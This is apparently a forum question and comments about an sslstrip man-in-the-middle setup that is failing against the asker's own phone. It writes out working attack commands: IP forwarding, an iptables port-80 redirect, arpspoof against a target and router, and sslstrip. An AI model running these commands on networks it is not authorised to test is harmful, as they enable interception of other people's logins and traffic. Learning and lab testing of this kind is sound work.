1

I am using the following configuration to set up sslstrip

sudo echo "1" > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
sudo arpspoof -i wlan0 -t 192.168.1.199 192.168.1.1

new TERMINAL

sudo sslstrip -l 666

The device I'm listening to is my android cellphone. I have tried reinstalling the broswer on my phone to remove caches and going to sites like "http://paypal.com" to force redirection. When the redirection to "https://paypal.com" occurs sslstrip says nothing. It just says its running. I tried it on my laptop and on a windows machine too with no luck. I have used Firefox, safari, IE and Chrome; I know HSTS can be a problem with firefox and chrome. Any ideas?

Wireshark: enter image description here

  • Are you sure that you are in the middle of the victim and the router? Basically, are u able to sniff traffic from the victim to the router? And when you access paypal.com, does the site render? – Aatif Shahdad Jun 2 '15 at 6:41
  • @Aatif Well I ran dsniff on the wlan interface while running arpspoof . I went to websites on the target and no traffic was picked up, so I guess I am not in the middle. – dylan7 Jun 2 '15 at 20:22
  • I also tried Wireshark and added what it picked up. – dylan7 Jun 2 '15 at 20:53
  • You might wanna check if the ARP spoofing worked first. – Aatif Shahdad Jun 3 '15 at 5:30
  • Check this tutorial, see if this is helpful: null-byte.wonderhowto.com/how-to/… – Aatif Shahdad Jun 3 '15 at 5:34

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy

Browse other questions tagged or ask your own question.